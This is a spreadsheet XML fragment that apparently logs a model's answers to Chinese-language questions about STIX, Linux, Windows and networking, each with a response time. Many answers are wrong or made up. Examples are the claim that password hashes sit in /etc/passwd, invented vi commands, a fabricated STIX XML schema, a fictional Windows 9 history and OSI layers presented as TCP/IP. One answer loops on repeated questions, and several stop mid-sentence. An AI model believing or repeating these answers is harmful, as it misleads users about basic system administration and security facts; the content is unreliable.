      <c r="A94" s="1" t="n">
        <v>92</v>
      </c>
      <c r="B94" t="inlineStr">
        <is>
          <t>STIX标准中Indicator对象是什么意思</t>
        </is>
      </c>
      <c r="C94" t="inlineStr">
        <is>
          <t>？
在STIX标准中，Indicator是一个抽象对象，用于表示攻击或漏洞的特征。具体来说，Indicator可以是：
1. 具有签名的文件：STIX中的Indicator可以是一个签名文件，用于指示攻击或漏洞的存在。
2. 扩展名：Indicator可以是一个扩展名，用于指示攻击或漏洞的存在。
3. 编程接口：Indicator可以是一个编程接口，用于指示攻击或漏洞的存在。
4. 具体识别符：Indicator可以是一个具体识别符，用于指示攻击或漏洞的存在。
Indicator的作用是为攻击或漏洞提供一个唯一的标识符，用于在STIX数据 modelo中进行检测和分析。Indicator可以是一个简单的文件名称或扩展名，也可以是一个更复杂的对象，如一个编程接口或具体识别符。
Indicator的具体定义取决于STIX标准的版本和使用场景。例如，STIX 1.2中Indicator是一个签名文件，用于指示攻击或漏洞的存在。而STIX 2.0中Indicator可以是一个编程接口，用于指示攻击或漏洞的存在。
总之，Indicator对象是STIX标准中用于表示攻击或漏洞的特征的抽象对象，具体的定义和使用方式取决于STIX标准的版本和使用场景。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D94" t="n">
        <v>13.48144364356995</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="1" t="n">
        <v>93</v>
      </c>
      <c r="B95" t="inlineStr">
        <is>
          <t>STIX标准中是如何定义Attack Pattern的</t>
        </is>
      </c>
      <c r="C95" t="inlineStr">
        <is>
          <t>？
STIX（Security Threat Intelligence eXchange）是一个开源的标准，用于描述和共享安全威胁INTelligence。STIX standard defines a set of XML-based data structures and schemas for representing threat intelligence information, including attack patterns.
An attack pattern in STIX is defined as a reusable representation of a specific type of attack, including the tactics, techniques, and procedures (TTPs) used to execute the attack. An attack pattern may also include information about the attacker, the target, and the potential impact of the attack.
Here is an example of how an attack pattern might be defined in STIX:
```
&lt;attackPattern&gt;
  &lt;id&gt;T1059&lt;/id&gt;
  &lt;name&gt;Command and Control&lt;/name&gt;
  &lt;description&gt;An attacker uses remote access to a compromised system to execute malicious commands and exfiltrate data.&lt;/description&gt;
  &lt;tactics&gt;
    &lt;tactic&gt;T1059.001&lt;/tactic&gt;
    &lt;name&gt;Establish Remote Access&lt;/name&gt;
    &lt;description&gt;The attacker gains remote access to the compromised system using a vulnerability or other means.&lt;/description&gt;
  &lt;/tactics&gt;
  &lt;techniques&gt;
    &lt;technique&gt;T1059.001.001&lt;/technique&gt;
    &lt;name&gt;Use PsExec&lt;/name&gt;
    &lt;description&gt;The attacker uses the PsExec tool to execute PowerShell commands on the compromised system.&lt;/description&gt;
  &lt;/techniques&gt;
  &lt;procedures&gt;
    &lt;procedure&gt;T1059.001.001.001&lt;/procedure&gt;
    &lt;name&gt;Create a scheduled task&lt;/name&gt;
    &lt;description&gt;The attacker creates a scheduled task to execute the malicious PowerShell command at a later time.&lt;/description&gt;
  &lt;/procedures&gt;
  &lt;actors&gt;
    &lt;actor&gt;Actor:A10&lt;/actor&gt;
    &lt;name&gt;Advanced Persistent Threat (APT) Group&lt;/name&gt;
    &lt;description&gt;The attacker is an APT group with a history of targeting sensitive organizations.&lt;/description&gt;
  &lt;/actors&gt;
  &lt;targets&gt;
    &lt;target&gt;
      &lt;id&gt;T1059&lt;/id&gt;
      &lt;name&gt;Sensitive Data&lt;/name&gt;
      &lt;description&gt;The attacker is targeting sensitive data, such as intellectual property or confidential customer information.&lt;/description&gt;
    &lt;/target&gt;
  &lt;/targets&gt;
  &lt;impact&gt;
    &lt;impact&gt;
      &lt;id&gt;T1059&lt;/id&gt;
      &lt;name&gt;Data Exfiltration&lt;/name&gt;
      &lt;description&gt;The attacker successfully exfiltrates sensitive data from the compromised system.&lt;/description&gt;
    &lt;/impact&gt;
  &lt;/impact&gt;
&lt;/attackPattern&gt;
```
In this example, the attack pattern is defined with the following elements:
* `id`: a unique identifier for the attack pattern
* `name`: a human-readable name for the attack pattern
* `description`: a detailed description of the attack pattern
* `tactics`: a list of tactics used to execute the attack
* `techniques`: a list of techniques used to execute the attack
* `procedures`: a list of procedures used to execute the attack
* `actors`: a list of actors involved in the attack
* `targets`: a list of targets of the attack
* `impact`: a list of potential impacts of the attack
By defining attack patterns in this way, STIX allows for the sharing and comparison of threat intelligence information across different organizations and systems. This can help improve the overall effectiveness of security defenses by enabling organizations to anticipate and prepare for potential attacks.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D95" t="n">
        <v>22.56059384346008</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="1" t="n">
        <v>94</v>
      </c>
      <c r="B96" t="inlineStr">
        <is>
          <t>主流的操作系统有哪些</t>
        </is>
      </c>
      <c r="C96" t="inlineStr">
        <is>
          <t>？
主流的操作系统都是哪些？
什么是操作系统？
操作系统的主要功能是什么？
操作系统的类型有哪些？
操作系统的主要特点是什么？
操作系统的应用领域是什么？
操作系统的发展历史是什么？
操作系统的发展趋势是什么？
操作系统的研发工具是什么？
操作系统的评估指标是什么？
操作系统的安全性是什么？
操作系统的可扩展性是什么？
操作系统的可靠性是什么？
操作系统的性能是什么？
操作系统的使用方式是什么？
操作系统的影响力是什么？
操作系统的竞争对手是什么？
操作系统的发展趋势是什么？
操作系统的应用领域是什么？
操作系统的研发工具是什么？
操作系统的评估指标是什么？
操作系统的安全性是什么？
操作系统的可扩展性是什么？
操作系统的可靠性是什么？
操作系统的性能是什么？
操作系统的使用方式是什么？
操作系统的影响力是什么？
操作系统的竞争对手是什么？
操作系统的发展趋势是什么？
操作系统的应用领域是什么？
操作系统的研发工具是什么？
操作系统的评估指标是什么？
操作系统的安全性是什么？
操作系统的可扩展性是什么？
操作系统的可靠性是什么？
操作系统的性能是什么？
操作系统的使用方式是什么？
操作系统的影响力是什么？
操作系统的竞争对手是什么？
操作系统的发展趋势是什么？
操作系统的应用领域是什么？
操作系统的研发工具是什么？
操作系统的评估指标是什么？
操作系统的安全性是什么？
操作系统的可扩展性是什么？
操作系统的可靠性是什么？
操作系统的性能是什么？
操作系统的使用方式是什么？
操作系统的影响力是什么？
操作系统的竞争对手是什么？
操作系统的发展趋势是什么？
操作系统的应用领域是什么？
操作系统的研发工具是什么？
操作系统的评估指标是什么？
操作系统的安全性是什么？
操作系</t>
        </is>
      </c>
      <c r="D96" t="n">
        <v>26.49403142929077</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="1" t="n">
        <v>95</v>
      </c>
      <c r="B97" t="inlineStr">
        <is>
          <t>Linux系统中创建文件夹的命令是什么</t>
        </is>
      </c>
      <c r="C97" t="inlineStr">
        <is>
          <t>？
 answered Jun 29, 2022 by linxer (30 points)
在Linux系统中，创建文件夹的命令为`mkdir`.
例如，要创建一个名为`myfolder`的文件夹，可以使用以下命令：
```
mkdir myfolder
```
如果要创建一个文件夹并在其中创建一个名为`file.txt`的文件，可以使用以下命令：
```
mkdir myfolder; echo "Hello, world!" &gt; myfolder/file.txt
```
在这个例子中，`mkdir`命令创建了一个名为`myfolder`的文件夹，然后`echo`命令创建了一个名为`file.txt`的文件并将其写入到`myfolder`文件夹中。
需要注意的是，如果要创建一个文件夹的路径，需要使用`/`符，例如：`mkdir /myfolder`。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D97" t="n">
        <v>6.94675087928772</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="1" t="n">
        <v>96</v>
      </c>
      <c r="B98" t="inlineStr">
        <is>
          <t>Linux系统文件的权限有哪些</t>
        </is>
      </c>
      <c r="C98" t="inlineStr">
        <is>
          <t>？
 Linux 系统文件的权限是指该文件可以访问、写入、读取或执行的权限。 Linux 系统文件的权限由文件系统、用户和组共同确定。
下面是 Linux 系统文件的权限几种常见情况：
1. 用户文件权限（User File Permissions）：
用户文件权限控制了文件的访问权限，包括读取、写入、执行和修改。用户文件权限使用三个数字，分别表示用户可读取、写入和执行的权限。例如，如果一个文件的用户文件权限为 644，则用户可以读取、写入和执行该文件，但不能修改它。
2. 组文件权限（Group File Permissions）：
组文件权限控制了文件的访问权限，与用户文件权限类似，但是 Control 的是组的访问权限。组文件权限使用三个数字，分别表示组可读取、写入和执行的权限。例如，如果一个文件的组文件权限为 755，则组可以读取、写入和执行该文件，但不能修改它。
3. 文件系统权限（File System Permissions）：
文件系统权限控制了文件系统的访问权限，包括读取、写入和执行。文件系统权限使用三个数字，分别表示文件系统可读取、写入和执行的权限。例如，如果一个文件的文件系统权限为 755，则文件系统可以读取、写入和执行该文件，但不能修改它。
4. 文件类型权限（File Type Permissions）：
文件类型权限控制了特定类型的文件的访问权限。例如，一个操作系统可能会设置特定类型的文件（如配置文件）不可读取或不可写入。
5. 父目录权限（Parent Directory Permissions）：
父目录权限控制了子目录的访问权限。父目录权限使用三个数字，分别表示父目录可读取、写入和执行的权限。例如，如果一个目录的父目录权限为 755，则父目录可以读取、写入和执行该目录，但不能修改它。
6. 虚拟主机权限（Virtual Host Permissions）：
虚拟主机权限控制了虚拟主机（如 Apache）的访问权限。虚拟主机权限使用三个数字，分别表示虚拟主机可读取、写入和执行的权限。例如，如果一个虚拟主机的虚拟主机权限为 755，则虚拟主机可以读取、写入和执行该虚拟主机，</t>
        </is>
      </c>
      <c r="D98" t="n">
        <v>26.49496006965637</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="1" t="n">
        <v>97</v>
      </c>
      <c r="B99" t="inlineStr">
        <is>
          <t>如何查看Linux系统的IP地址</t>
        </is>
      </c>
      <c r="C99" t="inlineStr">
        <is>
          <t>和网络配置？
在Linux系统上可以使用`ifconfig`和`ip addr`命令来查看网络配置和IP地址。
使用`ifconfig`命令可以查看当前网络接口的状态和配置，包括地址、网络名称、MTU等。例如：
```
$ ifconfig
```
这将显示当前网络接口的状态和配置。
使用`ip addr`命令可以查看当前系统的IP地址和网络配置。例如：
```
$ ip addr
```
这将显示当前系统的IP地址和网络配置。
如果您想要查看整个系统中的所有网络接口和IP地址，可以使用`netstat -an`命令。这将显示当前系统中的所有网络接口和IP地址，包括状态和配置。例如：
```
$ netstat -an
```
这将显示当前系统中的所有网络接口和IP地址，包括状态和配置。
如果您想要查看某个网络接口的详细信息，可以使用`ifconfig`命令和`ip addr`命令。例如，要查看eth0网络接口的详细信息，可以使用以下命令：
```
$ ifconfig eth0
$ ip addr show eth0
```
这将显示eth0网络接口的状态和配置，以及其相关的IP地址。
需要注意的是，不同的Linux Distribution可能有不同的命令和选项。以上命令和选项只是一些常见的命令和选项，可以根据具体的情况进行选择和使用。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D99" t="n">
        <v>13.05539965629578</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="1" t="n">
        <v>98</v>
      </c>
      <c r="B100" t="inlineStr">
        <is>
          <t>linux用户的密码保存在什么文件中</t>
        </is>
      </c>
      <c r="C100" t="inlineStr">
        <is>
          <t>？  How Linux stores the password for a user?
Linux stores user passwords in a file called `/etc/passwd`. This file contains a list of all user accounts on the system, along with their username, user ID, group ID, and password hash.
The password hash is a one-way encryption of the user's password, which means that it is impossible to recover the original password from the hash value. The hash value is generated using a cryptographic hash function, such as bcrypt or PBKDF2, and is stored in the `/etc/passwd` file.
When a user logs in, the system compares the entered password with the hash value stored in the `/etc/passwd` file. If the entered password matches the hash value, the user is authenticated and granted access to the system. If the entered password does not match the hash value, the user is denied access.
It's worth noting that the password hash value is not stored in plaintext in the `/etc/passwd` file. Instead, it is encrypted using a cryptographic algorithm, which makes it difficult for unauthorized users to access the password hash value.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D100" t="n">
        <v>6.460970878601074</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="1" t="n">
        <v>99</v>
      </c>
      <c r="B101" t="inlineStr">
        <is>
          <t>vi编辑器如何编辑、保存和退出</t>
        </is>
      </c>
      <c r="C101" t="inlineStr">
        <is>
          <t>？
vi编辑器是一款功能强大且简单易用的文本编辑器，它在Linux系统中非常流行。vi编辑器提供了许多快捷键和命令，可以快速编辑文本文件。下面是一些常用的编辑、保存和退出操作：
编辑操作：
1. 输入： vi filename (其中filename是要编辑的文本文件的名称)
2. 使用： i（ inserte Mode），a（ add Mode），c（ replace Mode），w（ write Mode）
3. 删除： d（ delete Characters），x（ delete Lines），r（ delete Word）
4. 复制： y（ copy Line），Y（ copy Word），p（ paste Line），P（ paste Word）
5. 粘贴： paste（ paste from clipboard），P（ paste from clipboard）
6. 改变： t（ change Text），T（ change Text）
7. 替换： r（ replace Text），R（ replace Text）
8. 新建： n（ create New Line），N（ create New Line）
9. 移动： m（ move Line），M（ move Line）
10. 格式化： f（ format Text），F（ format Text）
保存操作：
1. 输入： :w (write to file) or :wq (write and quit)
2. 使用： :q (quit without saving)，:q! (quit and discard changes)
退出操作：
1. 输入： :q (quit) or :q! (quit and discard changes)
2. 使用： :wq (write and quit)，:x (save and quit)
其他常用的快捷键和命令还包括：
* :, ( move cursor to the beginning of the line)
* :#, ( move cursor to the end of the line)
* :$ ( move cursor to the end of the file)
* :G ( move cursor to the last occurrence of a word)
* :Gr ( move cursor to the last occurrence of a regular expression)
* :H ( move cursor to the line before the current line)
* :L ( move cursor to the line after the current line)
* :P ( move cursor to the previous occurrence of a word)
* :Pm ( move cursor to the previous occurrence of a word and move the cursor down)
* :Pr ( move cursor to the next occurrence of a word)
* :Pr ( move cursor to the next occurrence of a word and move the cursor down)
* :S ( move cursor to the start of the line)
* :Sc ( move cursor to the start of the line and move the cursor down)
* :S- ( move cursor to the start of the line and move the cursor up)
* :S# ( move cursor to the start of the line and move the cursor to the end of the line)
* :S-$ ( move cursor to the start of the line and move the cursor to the end of the file)
需要注意的是，vi编辑器的快捷键和命令可以根据需要根据具体的用法和命令来更改。这些快捷键和命令都可以通过在vi编辑器中输入： :h (help)来查看具体的快捷键和命令。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D101" t="n">
        <v>22.92738437652588</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="1" t="n">
        <v>100</v>
      </c>
      <c r="B102" t="inlineStr">
        <is>
          <t>如何给linux系统配置静态IP</t>
        </is>
      </c>
      <c r="C102" t="inlineStr">
        <is>
          <t>？
 Linux 系统可以使用 `static` 网络配置来配置静态 IP 地址。以下是一些常见的方法：
1. 使用 `ifup` 命令
在系统中安装 `ifup` 命令，然后使用以下命令来配置静态 IP：
```
sudo ifup &lt;interface&gt; static &lt;IP address&gt; &lt;netmask&gt;
```
其中 `&lt;interface&gt;` 是要配置的网络接口， `&lt;IP address&gt;` 是静态 IP 地址， `&lt;netmask&gt;` 是网络掩码。
例如，要配置 eth0 接口的静态 IP，可以使用以下命令：
```
sudo ifup eth0 static 192.168.1.100 255.255.255.0
```
2. 使用 `route` 命令
可以使用 `route` 命令来配置静态 IP。例如：
```
sudo route add -net &lt;IP address&gt; netmask &lt;netmask&gt; gw &lt;gateway&gt; dev &lt;interface&gt;
```
其中 `&lt;IP address&gt;` 是静态 IP 地址， `&lt;netmask&gt;` 是网络掩码， `&lt;gateway&gt;` 是网络 gateway， `&lt;interface&gt;` 是要配置的网络接口。
例如，要配置 eth0 接口的静态 IP，可以使用以下命令：
```
sudo route add -net 192.168.1.100 netmask 255.255.255.0 gw 192.168.1.1 dev eth0
```
3. 使用 `network` 文件
可以使用 `network` 文件来配置静态 IP。例如：
```
sudo nano /etc/network/interfaces
```
在这个文件中添加以下内容：
```
iface eth0 static
 address 192.168.1.100
 netmask 255.255.255.0
```
4. 使用 `dhcpcd` 命令
可以使用 `dhcpcd` 命令来配置静态 IP。例如：
```
sudo dhcpcd -i eth0 -r 192.168.1.100 -n 255.255.255.0
```
其中 `-i eth0` 是要配置的网络接口， `-r` 是静态 IP 地址， `-n` 是网络掩码。
这些方法可以单独使用，也可以结合使用以实现不同的需求。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D102" t="n">
        <v>18.44834780693054</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="1" t="n">
        <v>101</v>
      </c>
      <c r="B103" t="inlineStr">
        <is>
          <t>什么版本的Windows最安全</t>
        </is>
      </c>
      <c r="C103" t="inlineStr">
        <is>
          <t>？
Microsoft Windows 中有许多版本，其中一些更加安全。根据安全性和可用性的评估，以下是一些可能最安全的版本：
1. Windows 10 Pro: Windows 10 Pro 是最新的主流版本，它提供了许多安全功能，包括一键更新、磁盘加密、防火墙和权限控制等。它还支持 Hyper-V，可以在虚拟环境中运行其他操作系统。
2. Windows 10 Enterprise: Windows 10 Enterprise 是企业版本，它具有更多的安全功能，如隐藏文件、远程访问和集成多重 Authentication。它适用于大型企业和政府机构。
3. Windows Server 2019: Windows Server 2019 是 Windows 系统的最新版本，它提供了许多新的安全功能，如一键更新、防火墙和权限控制等。它适用于大型企业和政府机构。
4. Windows 8.1 Pro: Windows 8.1 Pro 是 Windows 8 的一个版本，它具有许多安全功能，如防火墙和权限控制等。它还支持 BitLocker 随机加密。
5. Windows 7 Professional: Windows 7 Professional 是 Windows 7 的一个版本，它具有许多安全功能，如权限控制、防火墙和一键更新等。它适用于企业和个人用户。
需要注意的是，无论哪种版本的 Windows 您选择，都需要保持它在最新的安全更新中，以确保最高的安全性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D103" t="n">
        <v>14.45948386192322</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="1" t="n">
        <v>102</v>
      </c>
      <c r="B104" t="inlineStr">
        <is>
          <t>如何查看Windows系统的日志</t>
        </is>
      </c>
      <c r="C104" t="inlineStr">
        <is>
          <t>在Windows系统中，可以使用Event Viewer来查看系统日志。以下是查看系统日志的步驟：
1. 打开Event Viewer
在Control Panel中，click onSystem and Security，then click onEvent Viewer。或者，在搜索栏中输入“Event Viewer”并按下Enter键。
2. 查看系统日志
在Event Viewer中，您可以查看系统日志，包括系统设置、security、application、windows logs、system logs和 audit logs等。您可以通过浏览日志内容，了解系统的历史记录和发生错误的情况。
3. 筛选日志
您可以使用Event Viewer中的筛选功能来筛选日志，根据时间、日志类型和事件类型进行筛选。
4. 填充日志
您可以使用Event Viewer中的填充功能来填充日志，以便更好地了解系统的历史记录。
5. 导出日志
您可以使用Event Viewer中的导出功能来导出日志，以便将日志保存到文件中或者储存在其他位置。
6. 查看系统设置日志
在Event Viewer中，您可以查看系统设置日志，包括系统设置、security、application和windows logs等。
7. 查看security日志
在Event Viewer中，您可以查看security日志，包括安全策略、安全警示、安全事件和安全日志等。
8. 查看application日志
在Event Viewer中，您可以查看application日志，包括应用程序的启动、关闭和错误等。
9. 查看windows logs日志
在Event Viewer中，您可以查看windows logs日志，包括系统启动、系统错误、系统警告和系统告警等。
10. 查看audit logs日志
在Event Viewer中，您可以查看audit logs日志，包括系统的访问控制、安全策略和系统日志等。
总之，通过使用Event Viewer，您可以快速地查看Windows系统的日志，了解系统的历史记录和发生错误的情况。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D104" t="n">
        <v>18.55134272575378</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="1" t="n">
        <v>103</v>
      </c>
      <c r="B105" t="inlineStr">
        <is>
          <t>如何查看Windows系统的IP</t>
        </is>
      </c>
      <c r="C105" t="inlineStr">
        <is>
          <t>地址
你可以使用以下方法来查看Windows系统的IP地址：
1. 在“控制面板”中查看“网络和互联网”选项卡
在Windows系统中，可以通过控制面板来查看系统的网络设置。请到控制面板中，在左侧导航栏中选择“网络和互联网”选项卡。在这个选项卡上，你可以查看系统的IP地址。
2. 使用“ipconfig”命令
你也可以使用“ipconfig”命令在命令行中查看系统的IP地址。请在命令行中输入以下命令：
```
ipconfig
```
这将显示系统的所有网络设备的IP地址。
3. 使用“network and internet”客户端
你也可以使用“network and internet”客户端来查看系统的IP地址。请到“控制面板”中，在左侧导航栏中选择“网络和互联网”选项卡，然后在右侧的“网络和互联网”下拉菜单中选择“网络和互联网客户端”。在这个客户端中，你可以查看系统的IP地址。
4. 使用第三方工具
你还可以使用第三方工具来查看系统的IP地址。例如，你可以使用“Hosts”工具来查看系统的IP地址。请到“控制面板”中，在左侧导航栏中选择“系统和安全”选项卡，然后在下拉菜单中选择“系统”。在这个选项卡上，你可以查看系统的IP地址。
综上所述，你可以使用控制面板、“ipconfig”命令、“network and internet”客户端和第三方工具来查看Windows系统的IP地址。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D105" t="n">
        <v>15.498459815979</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="1" t="n">
        <v>104</v>
      </c>
      <c r="B106" t="inlineStr">
        <is>
          <t>Windows系统可以作为服务器系统吗</t>
        </is>
      </c>
      <c r="C106" t="inlineStr">
        <is>
          <t>？
Yes, Windows can be used as a server system. Windows Server is a version of Windows that is specifically designed for use as a server operating system, and it includes many features that make it well-suited for this role. Some of the key features of Windows Server include:
1. Server Role: Windows Server includes a server role that allows you to easily install and manage server applications and services, such as DNS, DHCP, and IIS.
2. Remote Access: Windows Server includes tools for remote access, such as Remote Desktop and Remote Access, which allow users to access and control their Windows servers from a remote location.
3. Networking: Windows Server includes a number of networking features, such as DNS, DHCP, and HTTP/HTTPS server, that are essential for a server system.
4. Security: Windows Server includes a number of security features, such as User Account Control (UAC), Windows Defender, and Windows Firewall, that help protect your server from unauthorized access and malware.
5. Scalability: Windows Server is highly scalable, allowing you to easily add more servers to your network as your needs grow.
6. Active Directory: Windows Server includes Active Directory, which is a powerful directory service that allows you to manage your users, groups, and other network resources.
7. PowerShell: Windows Server includes PowerShell, a powerful scripting language that allows you to automate many tasks and customize your server configuration.
8. Hyper-V: Windows Server includes Hyper-V, a hypervisor that allows you to create and manage virtual machines (VMs) on your server.
9. Failover Clustering: Windows Server includes failover clustering, which allows you to create a cluster of servers that can automatically take over the workload of another server in the event of a failure.
10. Application Server: Windows Server includes an application server that allows you to host and manage web applications.
Overall, Windows Server is a powerful and flexible operating system that can be used to build a wide range of server systems, from small to large, depending on your needs.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D106" t="n">
        <v>11.69133996963501</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="1" t="n">
        <v>105</v>
      </c>
      <c r="B107" t="inlineStr">
        <is>
          <t>Windows 9是什么系统</t>
        </is>
      </c>
      <c r="C107" t="inlineStr">
        <is>
          <t>？  What is Windows 9?
Windows 9 is a fictional operating system that has been the subject of numerous rumors and speculation over the years. There have been several instances where a new version of Windows, referred to as Windows 9, was announced or leaked, only to be later revealed to be a hoax or a misidentification.
The first major instance of Windows 9 rumors emerged in the early 2000s, when Microsoft was rumored to be working on a new version of Windows codenamed "Windows 9." At the time, Microsoft was expected to release Windows 9 in 2004, but the project was later canceled and the company instead focused on developing Windows Vista.
Since then, there have been numerous other instances of Windows 9 rumors, including leaks and speculation about upcoming versions of Windows. However, none of these have been officially confirmed by Microsoft, and the company has consistently maintained that there are no plans to release a new version of Windows 9.
In summary, Windows 9 is a fictional operating system that has been the subject of numerous rumors and speculation over the years, but there is no official confirmation from Microsoft that such a version exists or is in development.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D107" t="n">
        <v>7.006731271743774</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="1" t="n">
        <v>106</v>
      </c>
      <c r="B108" t="inlineStr">
        <is>
          <t>木马病毒通常在Windows系统中哪些地方创建启动项</t>
        </is>
      </c>
      <c r="C108" t="inlineStr">
        <is>
          <t>？  
木马病毒通常在Windows系统中哪些地方创建启动项？
木马病毒通常会在Windows系统中创建启动项以便在系统启动时执行恶意代码。以下是常见的启动项目：
1. 系统启动条件：木马病毒可以在系统启动时执行恶意代码，通常会在系统启动条件下执行，例如在 boot.ini 文件中添加一个 line。
2. 注册表：木马病毒可以通过编辑注册表来创建启动项，例如在 HKLM\Run 和 HKLM\RunOnce 下添加一个值。
3. 启动文件：木马病毒可以在启动文件中添加一个 line，例如在 autorun.inf 文件中添加一个 line。
4. 隐藏文件：木马病毒可以在隐藏文件中添加一个 line，例如在 C:\Windows\System32\drivers\hosts 文件中添加一个 line。
5. 网络协议：木马病毒可以在网络协议中添加一个规则，例如在 TCP/UDP 规则下添加一个规则。
6. 虚拟加密：木马病毒可以在虚拟加密中添加一个规则，例如在虚拟加密规则下添加一个规则。
7. 注册表键：木马病毒可以在注册表中添加一个键，例如在 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下添加一个键。
8. 启动缓冲区：木马病毒可以在启动缓冲区中添加一个值，例如在 C:\Windows\System32\drivers\hosts 文件中添加一个值。
需要注意的是，这些启动项的名称和路径可能会不同，因此需要根据具体情况进行定制。同时，防止木马病毒创建启动项的方法也有很多，例如使用 antivirus 软件检测和 removemarcos 等工具。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D108" t="n">
        <v>18.9875967502594</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="1" t="n">
        <v>107</v>
      </c>
      <c r="B109" t="inlineStr">
        <is>
          <t>TCP和UDP有什么区别</t>
        </is>
      </c>
      <c r="C109" t="inlineStr">
        <is>
          <t>？
TCP和UDP是两种常用的网络协议，它们之间有一些主要区别，下面是它们的主要区别：
1. 确认包：TCP是一种确认包的协议，它会在发送数据包时进行确认，如果数据包在传输过程中不可靠，会重新发送数据包。UDP则不进行确认，只是直接发送数据包。
2. 错误检测：TCP会在接收数据包时检测数据包的错误，如果发现错误，会返回错误的数据包。UDP不进行错误检测，直接将数据包传输给应用层。
3. Multicast：TCP不支持Multicast，UDP支持Multicast。
4. 可靠性：TCP的确认包机制提供了一定的可靠性，可以确保数据的传输，而UDP则不具备这个功能。
5. 应用层：TCP主要用于Application层的数据传输，而UDP主要用于Transport层的数据传输。
6. 报文头：TCP的报文头包含了各种信息，如源和目标端口号、Sequence Number、Acknowledgement Number等，而UDP的报文头只包含端口号和数据包的偏移量。
7. 扩展：TCP具有较强的扩展性，可以让应用层添加新的功能，而UDP的扩展性较弱。
总的来说，TCP是一种更可靠、更高层次的协议，适用于需要高度可靠性和可靠性的应用，如FSF、FTP、 Telnet等；UDP是一种更快速、更低层次的协议，适用于需要高速传输大量数据的应用，如音频、视频等。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D109" t="n">
        <v>16.09382581710815</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="1" t="n">
        <v>108</v>
      </c>
      <c r="B110" t="inlineStr">
        <is>
          <t>FTP属于TCP/IP模型中的哪一层</t>
        </is>
      </c>
      <c r="C110" t="inlineStr">
        <is>
          <t>？
FTP是一种文件传输协议，属于TCP/IP模型的应用层。具体地，FTP位于TCP/IP模型中的应用层，紧随 TCP 协议之后。
TCP/IP模型中的各层分别是：
1. 网络层 (Network Layer)：包括 IP 协议和 ICMP 协议。
2. 传输层 (Transport Layer)：包括 TCP 协议和 UDP 协议。
3. 应用层 (Application Layer)：包括 FTP、Telnet、HTTP、SMTP 等协议。
4. 会话层 (Session Layer)：包括 SSH 协议。
5.  presentaion层 (Presentation Layer)：包括 SSL/TLS 协议。
6. 数据驱动层 (Data Link Layer)：包括 Ethernet、PPP 等网络协议。
7. 物理层 (Physical Layer)：包括电缆、WIFI 等物理层网络协议。
因此，FTP属于TCP/IP模型中的应用层。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D110" t="n">
        <v>9.932053327560425</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="1" t="n">
        <v>109</v>
      </c>
      <c r="B111" t="inlineStr">
        <is>
          <t>DNS是明文的还是加密的</t>
        </is>
      </c>
      <c r="C111" t="inlineStr">
        <is>
          <t>？
DNS是明文的，它是一种分布式、查询式的域名系统。DNS服务器将域名解析成相应的 IP 地址，然后将这个 IP 地址发送给应用程序。因此，DNS 是明文的。
然而，DNS 也可以使用加密技术来保护域名解析过程中的数据。这种加密技术称为 DNSSEC，它可以防止 DNS 中的数据被恶意攻击或修改。但是，DNSSEC 并不是一种默认的 DNS 功能，需要在 DNS 服务器和客户端之间建立 специаль 的体系。
总之，DNS 是明文的，但是可以使用加密技术来保护它的安全性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D111" t="n">
        <v>6.508389472961426</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="1" t="n">
        <v>110</v>
      </c>
      <c r="B112" t="inlineStr">
        <is>
          <t>HTTP请求头有哪些字段</t>
        </is>
      </c>
      <c r="C112" t="inlineStr">
        <is>
          <t>？
HTTP请求头有以下几个字段：
1. `Host`: 指定请求的主机（Host）和端口（Port）。
2. `User-Agent`: 指定客户端的软件名称和版本号。
3. `Accept`: 指定客户端可以接受的响应类型（Content-Type）。
4. `Accept-Language`: 指定客户端的语言地区。
5. `Accept-Encoding`: 指定客户端的数据编码方式。
6. `Authorization`: 指定凭据（Authorization）用于请求访问保护的资源。
7. `Cookie`: 指定客户端已经接收的Cookies（Cookie）。
8. `Content-Type`: 指定请求体的类型（Content-Type）。
9. `Content-Length`: 指定请求体的大小（Content-Length）。
10. `Connection`: 指定客户端和服务器之间的连接方式（Connection）。
11. `Proxy-Authorization`: 指定客户端是否需要代理服务器的凭据（Proxy-Authorization）。
12. `If-Modified-Since`: 指定客户端是否需要响应已经修改的资源（If-Modified-Since）。
13. `If-None-Match`: 指定客户端是否需要响应不存在的资源（If-None-Match）。
14. `Range`: 指定客户端需要读取的资源的范围（Range）。
15. `TE`: 指定响应的类型（TE）。
这些字段可以根据实际情况进行调整，但一般来说，这些字段都是必须的。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D112" t="n">
        <v>13.30764222145081</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="1" t="n">
        <v>111</v>
      </c>
      <c r="B113" t="inlineStr">
        <is>
          <t>HTTP响应码有哪些？分表是什么含义</t>
        </is>
      </c>
